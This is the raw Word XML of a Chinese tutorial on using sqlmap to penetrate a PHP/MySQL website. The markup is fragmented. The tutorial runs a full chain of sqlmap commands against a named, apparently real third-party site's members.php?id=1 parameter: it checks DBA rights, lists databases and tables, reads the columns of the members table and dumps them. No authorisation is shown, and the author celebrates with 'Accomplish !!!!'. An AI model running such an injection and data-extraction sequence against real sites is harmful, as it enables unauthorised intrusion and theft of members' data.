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SQLMAP介绍及PHP网站渗透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Php —— MySQL数据库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.asfaa.org/members.php?id=1" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>http://www.asfaa.org/members.php?id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLine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Sqlmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">-u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default"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>http://www.asfaa.org/members.php?id=1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numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines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00575" cy="35115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Sqlmap -u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default"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>http://www.asfaa.org/members.php?id=1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--is-dba</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines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MySQL &gt;= 5.0.0  </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2004060" cy="381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False，进行下一步</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLine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Sqlmap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-u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default"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>http://www.asfaa.org/members.php?id=1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--dbs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines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列出所有的数据库，</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2339340" cy="8534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Sqlmap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-u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default"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>http://www.asfaa.org/members.php?id=1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--current-db，</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines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查找自己的数据库（db83231_asfaa）</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2214880" cy="35814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Sqlmap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-u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default"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>http://www.asfaa.org/members.php?id=1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--tables -D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db83231_asfaa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，根据db83231_asfaa数据库查询所有的表名（假</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t>设members表比较可疑）</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1094740" cy="1722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20954" b="5340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722120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Sqlmap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-u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default"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>http://www.asfaa.org/members.php?id=1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--columns -T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members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db83231_asfaa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numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:ind w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1905000" cy="1493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Sqlmap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-u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default"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>http://www.asfaa.org/members.php?id=1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--dump -C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imagem,nome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members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db83231_asfaa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,查询列的字段</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:ind w:firstLine="210" w:firstLineChars="10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967865" cy="2771140"/>
            <wp:effectExtent l="0" t="0" r="133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这个里面，完全没有找到密码之类的东西。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines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Accom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plish !!!!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:ind w:firstLine="442" w:firstLineChars="10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注入需谨慎，小心驶得万年船！！！！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B0821"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2B0B08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E217A"/>
    <w:rsid w:val="22557495"/>
    <w:rsid w:val="336F378D"/>
    <w:rsid w:val="40243A4A"/>
    <w:rsid w:val="40266332"/>
    <w:rsid w:val="42874596"/>
    <w:rsid w:val="43FC0A26"/>
    <w:rsid w:val="45974A62"/>
    <w:rsid w:val="4D492133"/>
    <w:rsid w:val="564103BD"/>
    <w:rsid w:val="57DA5FE2"/>
    <w:rsid w:val="609A06A7"/>
    <w:rsid w:val="60C267AF"/>
    <w:rsid w:val="7BC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2019-07-24T11:14:00Z</dcterms:created>
  <dc:creator>柠檬不萌</dc:creator>
  <cp:lastModifiedBy>柠檬不萌</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-25T09:39:59Z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